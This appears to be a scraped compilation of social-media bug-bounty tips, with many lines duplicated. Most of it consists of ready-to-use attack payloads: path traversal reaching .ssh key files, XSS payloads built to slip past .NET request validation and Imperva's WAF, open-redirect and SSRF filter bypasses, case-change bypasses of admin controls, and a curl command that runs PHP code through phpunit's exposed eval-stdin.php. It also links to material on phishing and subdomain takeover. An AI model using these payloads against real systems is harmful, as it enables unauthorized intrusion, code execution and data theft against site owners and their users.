#bugbountytip #bugbounty Directory listing bypass payloads : Any file name or folder name ..%3B/
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
/%20../
/.ssh/authorized_keys
/.ssh/known_hosts
/%2e%2e/google.com
..%3B/////////////////////////////////
#bugbountytip The Request.queryString error in .NET avoids you to get XSS? Try the %uff1cscript%uff1ealert(‘XSS’);%uff1c/script%uff1e payload ;)
5 Subdomain Takeover #ProTips.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/5%20Subdomain%20Takeover%20%23ProTips.pdf
Finding the Balance Between Speed & Accuracy During an Internet-wide Port Scanning.pdf:
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/Finding%20the%20Balance%20Between%20Speed%20&%20Accuracy%20During%20an%20Internet-wide%20Port%20Scanning.pdf
Phishing With a Rogue Wi-Fi Access Point.pdf
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/new_articles/Phishing%20With%20a%20Rogue%20Wi-Fi%20Access%20Point.pdf
#bugbountytip #Hacking #OSINT #Pentest
GitHub
blaCCkHatHacEEkr/PENTESTING-BIBLE
This repository was created and developed by Ammar Amer @cry__pto Only. Updates to this repository will continue to arrive until the number of links reaches 10000 links & 10000 pdf files .L...
Deeplink issues:
https://youtu.be/wyIx0D-M2S8
Exploitation of exported activities (OOS on some programs, nevertheless an interesting watch)
https://youtu.be/ZUikTuoCP_M
#bugbountytip #bugbounty
https://youtu.be/wyIx0D-M2S8
Exploitation of exported activities (OOS on some programs, nevertheless an interesting watch)
https://youtu.be/ZUikTuoCP_M
#bugbountytip #bugbounty
YouTube
Android Deeplinks and how to exploit them
In this video we go over what deeplinks are and ways they can be exploited. PoC examples and example reports are also reviewed.
Recently found a RXSS in captcha response
Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger
#BugBounty #BugBountyTip #BugBountyTips
Resolve captcha --> capture request --> change captcha response to XSS payload --> XSS trigger
#BugBounty #BugBountyTip #BugBountyTips
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
#bugbountytip If you found /phpunit/ folder than you can try to execute PHP code by typing the following command:
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
curl --data "<?php echo(pi());" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Web Scanners:
https://github.com/andresriancho/w3af
https://github.com/sullo/nikto
https://github.com/wpscanteam/wpscan
https://github.com/rezasp/joomscan
https://github.com/Arachni/arachni
https://github.com/droope/droopescan
https://github.com/Dionach/CMSmap
https://github.com/jekyc/wig
https://github.com/zaproxy/
https://github.com/skavngr/rapidscan
#web #bugbountytip
https://github.com/andresriancho/w3af
https://github.com/sullo/nikto
https://github.com/wpscanteam/wpscan
https://github.com/rezasp/joomscan
https://github.com/Arachni/arachni
https://github.com/droope/droopescan
https://github.com/Dionach/CMSmap
https://github.com/jekyc/wig
https://github.com/zaproxy/
https://github.com/skavngr/rapidscan
#web #bugbountytip
GitHub
GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner.
w3af: web application attack and audit framework, the open source web vulnerability scanner. - andresriancho/w3af
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty